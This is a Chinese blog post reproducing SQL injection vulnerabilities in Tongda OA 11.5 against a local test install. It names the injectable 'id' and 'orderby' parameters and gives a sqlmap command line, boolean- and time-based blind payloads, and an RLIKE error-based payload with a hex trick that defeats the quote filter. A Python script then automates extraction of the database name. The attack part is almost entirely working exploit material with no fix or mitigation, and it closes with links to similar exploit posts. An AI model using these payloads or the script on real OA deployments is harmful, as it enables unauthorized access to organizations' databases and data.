通达OA 11.5 SQL注入漏洞复现

已于 2023-11-10 20:23:11 修改
阅读量507 收藏 4
点赞数 4
文章标签: sql 数据库
于 2023-11-10 19:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzf011900/article/details/134339429
版权

1, 下载通达OA https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe

(下载完成之后登录 账号 admin  空密码)

2, 创建一个普通账户test:test123456

3, id参数存在sql注入

利用条件:一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入

参数位置:

/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2

webroot\general\appbuilder\modules\report\controllers\RepdetailController.php,actionEdit

函数中存在一个$_GET["id"];  未经过滤,拼接到SQL

GET /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2 HTTP/1.1

Host: 192.168.77.137

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Cookie: PHPSESSID=2jtfe5ckpfh9mklegtgs0t1e73; USER_NAME_COOKIE=test; OA_USER_ID=65; SID_65=9e1a1f39

DNT: 1

Connection: close

Upgrade-Insecure-Requests: 1

4, 登录test用户,构造urlhttp://192.168.77.135/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2,用burp抓包

5, sqlmap跑,(*号位置写自己的每人都不一样)看cookie值

sqlmap -u "http://localhost/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2" -p "id" --cookie="PHPSESSID=*****; USER_NAME_COOKIE=test; OA_USER_ID=65; SID_65=*****" --current-db

sqlmap 的payload:布尔盲注:link_type=false&slot={}&id=(SELECT (CASE WHEN (2489=2489) THEN 2 ELSE (SELECT 2530 UNION SELECT 6370) END))

时间盲注:link_type=false&slot={}&id=2 OR (SELECT 4201 FROM (SELECT(SLEEP(5)))birR)

漏洞点2 orderby参数

利用条件:一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入

位置一,/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3&pagelimit=10&tag=×tamp=1598069103&total=

位置二,/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=&pagelimit=10&tag=×tamp=1598069103&total=

这里使用rlike()报错注入,rlike()是regerp_like()的同义词。rlike遇到特殊字符(和)报错,于是表达式输出1正常回显,表达式错误即输出特殊字符,报错。这里还过滤了单引号,使用16进制绕过,(即为0x28)。

测试语句

3 RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END)) # 1=1为真,输出1,正常回显

3 RLIKE (SELECT (CASE WHEN (1=2) THEN 1 ELSE 0x28 END)) # 1=2为假,输出0x28,0x28为特殊字符报错

1=1回显正常

1=2报错

写一个脚本自动注入

import requests
import urllib
url = 'http://localhost/general/email/inbox/get_index_data.php'
cookies = "Pycharm-2c6ec227=c1fc5950-b2d3-4880-90f2-e1df25f3514d; USER_NAME_COOKIE=test; SID_65=689c2441; PHPSESSID=jq9lcf0tv2vn13n46rr9dhp1n1; OA_USER_ID=65"
sql = '(select database())'
flag = ''
for i in range(1, 50):
    high = 132
    low = 32
    mid = (high+low)//2
    while high > low:
        char = flag+chr(mid)
        headers = {
            "cookie": urllib.parse.unquote(cookies)
        }
        target = url + "?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3 RLIKE (SELECT (CASE " \
                    "WHEN (substr({0},{1},1)>={2}) THEN 1 ELSE 0x28 " \
                    "END))&pagelimit=10&tag=×tamp=1598069103&total= ".format(sql, i, hex(mid))
        # print(target)
        s = requests.get(url=target, headers=headers)
        # print(s.text)
        if 'timestamp' in s.text:
            low = mid+1
        else:
            high = mid
        mid = (high+low)//2
        if mid == 33 or mid ==132:
            exit(0)
    flag += chr(mid-1)
    print("[+] "+flag)

看到爆出来的 库是t0z0a

什么都好奇
关注
漏洞复现通达oa 前台sql注入
失心少年
11-19 554
它涵盖了企业日常办公所需的各项功能,包括人事管理、财务管理、采购管理、销售管理、库存管理、生产管理、办公自动化等。通达OA支持PC端和移动端使用,可以实现随时随地办公,提高工作效率和协作能力。同时,它还具备高度可定制性和扩展性,可以根据企业的实际需求进行定制开发,满足企业的个性化需求。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
通达OA get_datas.php前台sql注入-可获取数据库session登入后台漏洞复现 [附POC]
薛定谔嘚喵博客
11-08 689
攻击者通过对某OA系统进行代码审计,找到get_datas.php文件中执行sql语句的变量处于可控状态。并可以通过此漏洞获取在线用户的Session值。通过构造绕过特殊的sql注入语句,对在线用户Session记录进行任意查询。利用该漏洞可以实现任意用户登录。配合任意文件上传漏洞,上传webshell。
通达OA 11.7 后台sql注入getshell漏洞复现
Adminxe的博客
09-23 1652
0x00 漏洞描述 通达OA 11.7存在sql注入 0x01 漏洞影响版本 通达oa 11.7 利用条件:需要账号登录 0x02 漏洞复现 1、下载通达OA 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe,点击安装 2、condition_cascade参数存在布尔盲注 POC: GET /general/hr/manage/query/delete_cascade.php?condition_cascade=se...
通达OA SQL注入漏洞【CVE-2023-4166】
holyxp的博客
08-10 4618
通达OA系统,即Offic Anywhere,又称为网络智能办公系统,是通达科技公司针对各行业办公与管理开发的办公应用系统。通达OA系统采用领先的B/S架构,采用基于WEB网络的开发方式,能够使得企业及个人办公不再受地域限制,实现信息化、自动化、移动化高效便捷办公。漏洞2(CVE-2023-4166)general/system/seal_manage/dianju/delete_log.php文件,对参数 DELETE_STR 的操作会导致 sql 注入
通达OA SQL注入漏洞【CVE-2023-4165】
holyxp的博客
08-10 2899
通达OA系统,即Offic Anywhere,又称为网络智能办公系统,是通达科技公司针对各行业办公与管理开发的办公应用系统。通达OA系统采用领先的B/S架构,采用基于WEB网络的开发方式,能够使得企业及个人办公不再受地域限制,实现信息化、自动化、移动化高效便捷办公。漏洞1(CVE-2023-4165)文件,对参数 DELETE_STR 的操作会导致 sql 注入
通达OA query.php SQL注入漏洞
Keepb1ue的博客
04-28 775
通达OA(Office Automation)是一款企业级协同办公软件,旨在为企业提供高效、便捷、安全、可控的办公环境。它涵盖了企业日常办公所需的各项功能,包括人事管理、财务管理、采购管理、销售管理、库存管理、生产管理、办公自动化等。通达OA支持PC端和移动端使用,可以实现随时随地办公,提高工作效率和协作能力。同时,它还具备高度可定制性和扩展性,可以根据企业的实际需求进行定制开发,满足企业的个性化需求。通达OA广泛应用于各类企业,帮助企业实现数字化转型,提高管理效率和竞争力。
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
09-07
通达OA漏洞合集
通达OA sql注入漏洞.zip
08-24
该压缩包文件“通达OA sql注入漏洞.zip”包含了与这个特定漏洞相关的材料。`README.md`文件通常会提供项目简介、如何运行和验证漏洞的步骤,以及可能的安全建议。`CVE-2023-4166.py`很可能是一个Python脚本,设计...
通达OA v11.6 insert SQL注入漏洞.md
09-07
通达OA漏洞合集
红帆OA iocomGetAtt SQL注入漏洞复现
0xSec
02-26 844
红帆iOffice.netiocomGetAtt.aspx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
2022-10-10(通达OA SQL注入漏洞)
qq_45751902的博客
10-10 2046
经过测试发现过滤了单引号,对r字符进行转换成16进制,通过手工最终获得数据库用户名root。使用手工注入,经过测试发现过滤了单引号,对r字符进行转换成16进制(用户名是root)首先创建一个普通账户 lisi:lisi123456。中存在 一个$_GET[“id”];参数位置:SORT_ID,FILE_SORT。发现时间明显变长了,再此证明id没有被过滤。登录账号是admin,密码为空。利用条件:一枚普通账号登录权限。利用条件:11.5版本无需登录。
SQL注入-通达OA SQL注入漏洞【CVE-2023-4166】原理及检测思路分析
最新发布
#7的博客
05-08 936
本文主要介绍漏洞CVE-2023-4166即通达OA SQL注入漏洞的原理、攻击手法及检测思路。
通达OA 11.5 sql注入漏洞复现
weixin_45291045的博客
02-13 577
下载地址:https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe 1.登录一个账户 2.构造url http://192.168.1.1general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2,burp抓包 id参数存在延时注入 直接复制数据包,id参数加个*保存到sqlmap跑 python sqlmap.py -r 1.txt orderby参数 构
通达oasharehandle.phpsql注入漏洞(含批量验证poc)
weixin_43567873的博客
04-07 126
通达oasharehandle.phpsql注入漏洞(含批量验证poc)
通达OA1.5SQL注入漏洞复现
weixin_51716781的博客
05-10 378
通达OA1.5漏洞复现 本文章记录初学者的笔记,仅限于渗透测试,请勿做违法操作,如出现问题与本作者无关 1:测试机上安装通达OA11.5版本:查看IP地址为:192.168.78.150 2:登录admin账号:创建一个普通职员权限 3:登录普通用户的权限,使用bp抓包:构造URL: /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2 or sleep(0) 判断是否存在sql注入 4:图三
通达OA连接MSSQL数据库
pengxuanlan的专栏
01-14 596
通达OA的PHP.ini中启用了对MSSQL的支持,但是呢, 得在服务器上安装ODBC驱动,今天就是折腾了好久,才搞明白 依据MSSQL版本的不一样,安装的ODBC驱动也不一样, 文件名称为: msodbcsql.msi ...
通达OA v11.6 揭示严重insert SQL注入漏洞
通达OA v11.6版本存在一个严重的SQL注入漏洞。这个漏洞出现在insert操作中,攻击者能够利用该漏洞对系统数据库执行恶意SQL代码,从而获取敏感数据或进行未授权的操作。漏洞的关键在于`insert`参数处理不当,允许恶意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

什么都好奇

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值